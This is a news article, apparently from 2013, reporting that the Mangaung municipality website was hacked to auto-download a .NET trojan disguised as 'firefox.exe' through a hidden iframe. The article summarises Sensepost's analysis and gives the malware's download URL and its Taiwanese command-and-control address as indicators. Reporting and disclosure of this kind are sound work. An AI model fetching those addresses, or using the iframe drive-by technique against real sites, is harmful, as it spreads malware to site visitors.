Mangaung website hacked, serving malware from Jamaica

The website for the Mangaung municipality (mangaung.co.za, bloemfontein.co.za) is serving malware hosted on the website of the Jamaica Cultural Development Commission (jcdc.gov.jm).

 

At the time of writing, more than a day after informing both the State Information Technology Agency (SITA) and the JCDC, a Windows executable is automatically downloaded to your computer when you visit the website of the Mangaung municipality.

 

Interestingly, visiting the the JCDC website did not trigger the file download.

 

The executable is called “firefox.exe” and it was embedded in the Mangaung website using a simple HTML <iframe> tag pointing to http://www.jcdc.gov.jm/uploads/firefox.exe.

 

The source of the Mangaung website also contained an iframe pointing to a firefox.exe file hosted on shell32.tk, but it appeared to be inaccessible.

Mangaung firefox.exe malware download prompt

 

Mangaung firefox.exe malware download prompt

Masquerading as Firefox? Smells like FinSpy

 

A report recently released by Citizen Lab revealed that a spyware suite used by governments known as FinFisher sometimes had its trojan (FinSpy) masquerade as Firefox.

 

Add to this that Citizen Lab reported that it had discovered command & control servers for the spyware suite on the Telkom network in South Africa, and a logical first reaction is to suspect that a version of the FinSpy trojan was being hosted on the Mangaung website.

 

However, Citizen Lab’s report suggests that FinSpy would use far less overt methods of infecting a machine.

 

An investigation by Citizen Lab, which was later confirmed by Sensepost, indicated that the malware was not FinFisher.

Taiwanese spyware?

 

A quick check on VirusTotal did not provide conclusive results as to what this malware might be, but further prodding from Sensepost revealed that the trojan was written in .NET.

 

Jeremy du Bruyn, a security expert at Sensepost, explained the trojan’s code had been obfuscated, making it more difficult to see what its purpose is.

 

“It employs a number of measures to make static analysis of the malware more difficult, for instance by calling ‘IsDebuggerPresent’ to check if it is being analysed and if so exit; as well as not using any hardcoded strings,” Du Bruyn said.

 

The trojan developer appears to be Chinese-speaking, Du Bruyn said, which he said correlates with the Taiwanese IP address of the command & control server.

 

“The Trojan communicates with an IP in Taiwan, specifically 114.34.216.71 on port 888,” Du Bruyne said.

Jeremy du Bruyn from Sensepost

 

Jeremy du Bruyn from Sensepost

Malware still being served

 

At the time of publication the Mangaung website was still serving the malware, despite SITA and the JDCD being alerted to it on Thursday, 30 May 2013.

 

While the JDCD did not respond by the time of publication, a SITA spokesperson did tell MyBroadband that they don’t provide the hosting for this particular government website.

 

Thanks to Siavosh, Jeremy, and Dominic of Sensepost for their work in analysing the malware. Thanks to John and the team from Citizen Lab who also provided valuable information for this article.

Phummy

Phummy's picture